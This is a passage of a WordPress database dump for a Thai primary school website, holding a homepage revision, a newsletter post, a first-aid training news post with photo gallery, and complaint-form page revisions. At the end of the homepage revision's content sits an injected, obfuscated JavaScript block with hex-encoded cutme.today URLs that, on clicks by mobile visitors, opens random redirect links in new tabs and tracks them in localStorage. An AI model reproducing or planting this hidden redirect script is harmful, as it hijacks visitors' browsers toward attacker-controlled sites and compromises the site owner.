gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-06-16 10:37:37','2025-06-16 03:37:37','',14,'http://pakhaeng.ssk.in.th/?p=1399',0,'revision','',0),
(1400,1,'2025-06-16 16:03:46','2025-06-16 09:03:46','<!-- wp:image {\"id\":1401,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/8-68-724x1024.png\" alt=\"\" class=\"wp-image-1401\"/></figure>\n<!-- /wp:image -->','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-37','','','2025-06-16 16:03:48','2025-06-16 09:03:48','',0,'http://pakhaeng.ssk.in.th/?p=1400',0,'post','',0),
(1401,1,'2025-06-16 16:03:31','2025-06-16 09:03:31','','8-68','','inherit','','closed','','8-68','','','2025-06-16 16:03:31','2025-06-16 09:03:31','',1400,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/8-68.png',0,'attachment','image/png',0),
(1402,1,'2025-06-16 16:03:46','2025-06-16 09:03:46','<!-- wp:image {\"id\":1401,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/8-68-724x1024.png\" alt=\"\" class=\"wp-image-1401\"/></figure>\n<!-- /wp:image -->','วารสารประชาสัมพันธ์','','inherit','closed','closed','','1400-revision-v1','','','2025-06-16 16:03:46','2025-06-16 09:03:46','',1400,'http://pakhaeng.ssk.in.th/?p=1402',0,'revision','',0),
(1403,1,'2025-06-16 16:05:26','2025-06-16 09:05:26','<!-- wp:paragraph -->\n<p><strong>วันที่ 16 มิถุายน พ.ศ.2568 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ นำนักเรียนเข้าร่วมอบรมเชิงปฏิบัติการปฐมพยาบาลและกู้ชีพเบื้องต้น จัดขึ้นโดย รพ.สต.โพธิ์ เพื่อให้นักเรียนและผู้เข้าร่วมอบรมได้มีความรู้และสามารถนำไปใช้ในชีวิตประจำวันได้จริงและอย่างถูกต้อง ในการนี้ได้รับเกียรติ จากนายวิชิต ไตรสรณกุล นายก อบจ.ศรีสะเกษ มาเป็นประธานเปิดโครงการในครั้งนี้</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1404,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/309533-1024x622.jpg\" alt=\"\" class=\"wp-image-1404\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1406,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/309534-1024x477.jpg\" alt=\"\" class=\"wp-image-1406\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1408,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/309536-1024x473.jpg\" alt=\"\" class=\"wp-image-1408\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1409,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1564910-1024x473.jpg\" alt=\"\" class=\"wp-image-1409\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1405,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1564911-1024x473.jpg\" alt=\"\" class=\"wp-image-1405\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1407,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1564919-1024x473.jpg\" alt=\"\" class=\"wp-image-1407\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1410,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1573002-1024x473.jpg\" alt=\"\" class=\"wp-image-1410\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1411,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1573003-1024x473.jpg\" alt=\"\" class=\"wp-image-1411\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1412,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1574083-1024x474.jpg\" alt=\"\" class=\"wp-image-1412\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1413,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1574084-1024x474.jpg\" alt=\"\" class=\"wp-image-1413\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','โครงการอบรมเชิงปฏิบัติการปฐมพยาบาลและกู้ชีพเบื้องต้น','','publish','closed','closed','','%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1%e0%b9%80%e0%b8%8a%e0%b8%b4%e0%b8%87%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4','','','2025-06-16 16:05:29','2025-06-16 09:05:29','',0,'http://pakhaeng.ssk.in.th/?p=1403',0,'post','',0),
(1404,1,'2025-06-16 16:04:56','2025-06-16 09:04:56','','309533','','inherit','','closed','','309533','','','2025-06-16 16:04:56','2025-06-16 09:04:56','',1403,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/309533.jpg',0,'attachment','image/jpeg',0),
(1405,1,'2025-06-16 16:04:56','2025-06-16 09:04:56','','1564911','','inherit','','closed','','1564911','','','2025-06-16 16:04:56','2025-06-16 09:04:56','',1403,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1564911.jpg',0,'attachment','image/jpeg',0),
(1406,1,'2025-06-16 16:04:56','2025-06-16 09:04:56','','309534','','inherit','','closed','','309534','','','2025-06-16 16:04:56','2025-06-16 09:04:56','',1403,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/309534.jpg',0,'attachment','image/jpeg',0),
(1407,1,'2025-06-16 16:04:57','2025-06-16 09:04:57','','1564919','','inherit','','closed','','1564919','','','2025-06-16 16:04:57','2025-06-16 09:04:57','',1403,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1564919.jpg',0,'attachment','image/jpeg',0),
(1408,1,'2025-06-16 16:04:57','2025-06-16 09:04:57','','309536','','inherit','','closed','','309536','','','2025-06-16 16:04:57','2025-06-16 09:04:57','',1403,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/309536.jpg',0,'attachment','image/jpeg',0),
(1409,1,'2025-06-16 16:04:57','2025-06-16 09:04:57','','1564910','','inherit','','closed','','1564910','','','2025-06-16 16:04:57','2025-06-16 09:04:57','',1403,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1564910.jpg',0,'attachment','image/jpeg',0),
(1410,1,'2025-06-16 16:05:00','2025-06-16 09:05:00','','1573002','','inherit','','closed','','1573002','','','2025-06-16 16:05:00','2025-06-16 09:05:00','',1403,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1573002.jpg',0,'attachment','image/jpeg',0),
(1411,1,'2025-06-16 16:05:01','2025-06-16 09:05:01','','1573003','','inherit','','closed','','1573003','','','2025-06-16 16:05:01','2025-06-16 09:05:01','',1403,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1573003.jpg',0,'attachment','image/jpeg',0),
(1412,1,'2025-06-16 16:05:01','2025-06-16 09:05:01','','1574083','','inherit','','closed','','1574083','','','2025-06-16 16:05:01','2025-06-16 09:05:01','',1403,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1574083.jpg',0,'attachment','image/jpeg',0),
(1413,1,'2025-06-16 16:05:02','2025-06-16 09:05:02','','1574084','','inherit','','closed','','1574084','','','2025-06-16 16:05:02','2025-06-16 09:05:02','',1403,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1574084.jpg',0,'attachment','image/jpeg',0),
(1414,1,'2025-06-16 16:05:26','2025-06-16 09:05:26','<!-- wp:paragraph -->\n<p><strong>วันที่ 16 มิถุายน พ.ศ.2568 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ นำนักเรียนเข้าร่วมอบรมเชิงปฏิบัติการปฐมพยาบาลและกู้ชีพเบื้องต้น จัดขึ้นโดย รพ.สต.โพธิ์ เพื่อให้นักเรียนและผู้เข้าร่วมอบรมได้มีความรู้และสามารถนำไปใช้ในชีวิตประจำวันได้จริงและอย่างถูกต้อง ในการนี้ได้รับเกียรติ จากนายวิชิต ไตรสรณกุล นายก อบจ.ศรีสะเกษ มาเป็นประธานเปิดโครงการในครั้งนี้</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1404,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/309533-1024x622.jpg\" alt=\"\" class=\"wp-image-1404\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1406,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/309534-1024x477.jpg\" alt=\"\" class=\"wp-image-1406\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1408,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/309536-1024x473.jpg\" alt=\"\" class=\"wp-image-1408\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1409,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1564910-1024x473.jpg\" alt=\"\" class=\"wp-image-1409\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1405,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1564911-1024x473.jpg\" alt=\"\" class=\"wp-image-1405\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1407,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1564919-1024x473.jpg\" alt=\"\" class=\"wp-image-1407\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1410,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1573002-1024x473.jpg\" alt=\"\" class=\"wp-image-1410\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1411,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1573003-1024x473.jpg\" alt=\"\" class=\"wp-image-1411\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1412,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1574083-1024x474.jpg\" alt=\"\" class=\"wp-image-1412\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1413,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1574084-1024x474.jpg\" alt=\"\" class=\"wp-image-1413\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','โครงการอบรมเชิงปฏิบัติการปฐมพยาบาลและกู้ชีพเบื้องต้น','','inherit','closed','closed','','1403-revision-v1','','','2025-06-16 16:05:26','2025-06-16 09:05:26','',1403,'http://pakhaeng.ssk.in.th/?p=1414',0,'revision','',0),
(1416,1,'2025-06-25 10:43:22','2025-06-25 03:43:22','','%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3','','publish','closed','closed','','contact-form','','','2025-07-01 10:10:32','2025-07-01 03:10:32','',0,'http://pakhaeng.ssk.in.th/?post_type=forminator_forms&#038;p=1416',0,'forminator_forms','',0),
(1418,1,'2025-06-25 10:46:06','2025-06-25 03:46:06','<!-- wp:shortcode -->\n[forminator_form id=\"1416\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','476-revision-v1','','','2025-06-25 10:46:06','2025-06-25 03:46:06','',476,'http://pakhaeng.ssk.in.th/?p=1418',0,'revision','',0),
(1419,1,'2025-06-25 11:18:34','2025-06-25 04:18:34','<!-- wp:shortcode -->\n[forminator_form id=\"1416\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"94d1aa0a\",\"hasUrl\":true,\"target\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"spacing\":{\"paddingTop\":\"15px\",\"paddingRight\":\"20px\",\"paddingBottom\":\"15px\",\"paddingLeft\":\"20px\"},\"backgroundColor\":\"#0366d6\",\"backgroundColorHover\":\"#222222\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-94d1aa0a gb-button-text\" href=\"https://pakheang.my.canva.site/compliant\" target=\"_blank\" rel=\"noopener noreferrer\">Button</a>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','476-revision-v1','','','2025-06-25 11:18:34','2025-06-25 04:18:34','',476,'http://pakhaeng.ssk.in.th/?p=1419',0,'revision','',0),
(1420,1,'2025-06-25 11:31:57','2025-06-25 04:31:57','<!-- wp:shortcode -->\n[forminator_form id=\"1416\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','476-revision-v1','','','2025-06-25 11:31:57','2025-06-25 04:31:57','',476,'http://pakhaeng.ssk.in.th/?p=1420',0,'revision','',0),
